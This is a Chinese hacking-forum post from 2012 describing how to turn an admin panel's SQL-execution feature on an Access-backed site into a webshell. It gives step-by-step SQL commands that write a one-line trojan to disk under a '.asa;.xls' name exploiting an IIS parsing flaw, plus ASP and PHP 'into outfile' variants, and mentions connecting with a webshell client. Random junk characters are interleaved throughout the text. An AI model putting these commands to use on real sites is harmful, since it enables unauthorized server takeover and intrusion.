找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2004|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。" y& f8 e9 O# F8 x* D: a
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的0 Y0 [5 B, h+ z% v  X7 U/ V
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
6 K. D7 E, i7 T/ m然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
6 H  q) t4 u2 D2 A3 `6 b1.create table cmd (a varchar(50))
2 X( ?% l, c' C0 _# c! S1 e1 v8 w2.insert into cmd (a) values (‘‘)
- h, O0 f6 J2 C* }+ L3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
2 _3 X/ p9 @# T9 J(把表cmd的内容导出为物理路径的一个EXCEL文件)  v( g* S8 U4 p8 K# Q0 H
4.drop table cmd
8 D$ p6 R8 e/ b利用IIS的BUG成功拿到了WEBSHELL。$ m2 N! H/ p' z( B3 W0 A$ W

& z5 d8 G& E( n" Z) M9 d% F直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话# j/ W! G1 @# K( }9 @/ t4 ^
+ n$ R$ R- C9 G& j8 s; Y" w$ a
  SQL语句意思解释:
5 C1 Y5 K! t& P+ m9 o, G) g  第一句
7 \6 ~( \, m3 f4 b" j  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50, f. T. F% ~, S3 n
& e! V9 A* O( o% k$ v  W" Y, e
  第二句5 `- B* |$ a3 `8 Y$ h# i
  在表cmd的a字段插入一句话木马0 p* p7 A: p" _7 W
  第三句5 b) i7 w3 d( S' m
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件" `( H4 j. e, D

0 y$ a  {- S+ k0 b4 y6 L7 j  第四句1 Z7 D$ |0 g7 O6 Z3 @
  删除建立的cmd表
3 I* o$ q2 |! j/ w- @% _
# e/ v4 p! X/ Q4 \& y6 ^& d  以下内容为测试:- A( m, V& R6 e+ Y; q7 V, }. S
  Access利用后台SQL执行命令功能导出WebShell:
6 q% c# F- [- ^( E3 Q' j4 P  这个更简单:3 \  R" ^- f0 \% o1 C
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]& B8 X8 C  \7 ]- p# }2 U* Y/ S6 _
  或者% i7 V7 S% t! J" R8 E  d
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
9 @. o1 X: `- d! n% ]% h
4 A: G8 g6 I' O  k0 u" i; s6 H+ U  后台有执行SQL语句功能(vote为已知表段)% B& x9 z6 V" R+ I9 s( ~; n& w7 a
  希望对大家有所帮助拿shell的又一个思路' s- C8 A1 E# `4 r7 |  q. a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表